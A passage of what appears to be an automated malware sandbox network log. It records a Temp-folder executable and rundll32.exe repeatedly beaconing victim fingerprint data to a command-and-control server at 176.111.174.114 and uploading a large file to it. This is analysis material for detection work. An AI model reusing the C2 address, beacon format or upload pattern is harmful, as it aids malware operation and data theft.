                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          332 | 176.111.174.114 | 80 | 192.168.2.4 | 49946 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.474809885 CEST | 10669 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          333 | 176.111.174.114 | 80 | 192.168.2.4 | 49948 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.484822989 CEST | 10669 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          334 | 192.168.2.4 | 49950 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.692403078 CEST | 10670 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          335 | 176.111.174.114 | 80 | 192.168.2.4 | 49950 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:03.792205095 CEST | 10671 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:03 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          336 | 192.168.2.4 | 49951 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.020566940 CEST | 10671 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          337 | 176.111.174.114 | 80 | 192.168.2.4 | 49951 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.121830940 CEST | 10672 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          338 | 192.168.2.4 | 49952 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.329595089 CEST | 10672 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          339 | 176.111.174.114 | 80 | 192.168.2.4 | 49952 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.429030895 CEST | 10673 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          34 | 192.168.2.4 | 49765 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:15.731309891 CEST | 4538 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          340 | 192.168.2.4 | 49953 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.647456884 CEST | 10673 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          341 | 176.111.174.114 | 80 | 192.168.2.4 | 49953 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.751154900 CEST | 10674 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:04 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          342 | 192.168.2.4 | 49955 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:04.958950996 CEST | 10674 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          343 | 176.111.174.114 | 80 | 192.168.2.4 | 49955 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:05.060460091 CEST | 10675 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
344 | 192.168.2.4 | 49956 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:05.272541046 CEST | 10675 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
345 | 176.111.174.114 | 80 | 192.168.2.4 | 49956 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:05.376384974 CEST | 10676 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
346 | 192.168.2.4 | 49957 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:05.582420111 CEST | 10676 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
347 | 176.111.174.114 | 80 | 192.168.2.4 | 49957 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:05.683186054 CEST | 10677 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
348 | 192.168.2.4 | 49958 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:05.910500050 CEST | 10677 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
349 | 176.111.174.114 | 80 | 192.168.2.4 | 49958 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.014380932 CEST | 10678 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:05 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 176.111.174.114 | 80 | 192.168.2.4 | 49765 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:15.833139896 CEST | 4538 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:15 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
350 | 192.168.2.4 | 49959 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.137056112 CEST | 10691 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
351 | 192.168.2.4 | 49960 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.225959063 CEST | 10692 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
352 | 176.111.174.114 | 80 | 192.168.2.4 | 49960 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.331362009 CEST | 10719 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
353 | 192.168.2.4 | 49961 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.537075996 CEST | 10879 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
354 | 176.111.174.114 | 80 | 192.168.2.4 | 49961 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.640202999 CEST | 10907 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
355 | 176.111.174.114 | 80 | 192.168.2.4 | 49959 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.647165060 CEST | 10908 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
356 | 192.168.2.4 | 49963 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.853204012 CEST | 10908 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
357 | 176.111.174.114 | 80 | 192.168.2.4 | 49963 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:06.957252979 CEST | 10909 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:06 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
358 | 192.168.2.4 | 49964 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.159348965 CEST | 10909 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
359 | 176.111.174.114 | 80 | 192.168.2.4 | 49964 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.257025957 CEST | 10910 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:07 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.4 | 49766 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:16.347454071 CEST | 4539 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
360 | 192.168.2.4 | 49965 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:07.475827932 CEST | 10910 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
